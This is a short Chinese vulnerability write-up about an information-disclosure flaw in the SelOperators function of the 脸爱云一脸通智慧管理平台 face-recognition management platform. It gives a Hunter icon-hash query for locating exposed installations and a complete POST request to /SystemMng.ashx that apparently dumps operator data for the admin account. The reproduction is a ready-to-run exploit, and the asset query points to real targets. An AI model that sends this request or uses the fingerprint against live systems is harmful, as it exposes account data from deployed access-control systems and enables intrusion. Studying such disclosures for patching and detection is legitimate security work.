脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞
一、漏洞简介
脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞。
二、影响版本
- 脸爱云一脸通智慧管理平台
三、资产测绘
- hunter
web.icon=="4f0be080512ee0b45fc90ff894b6ba60" - 特征
四、漏洞复现
POST /SystemMng.ashx HTTP/1.1
Host:
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
username=admin&funcName=SelOperators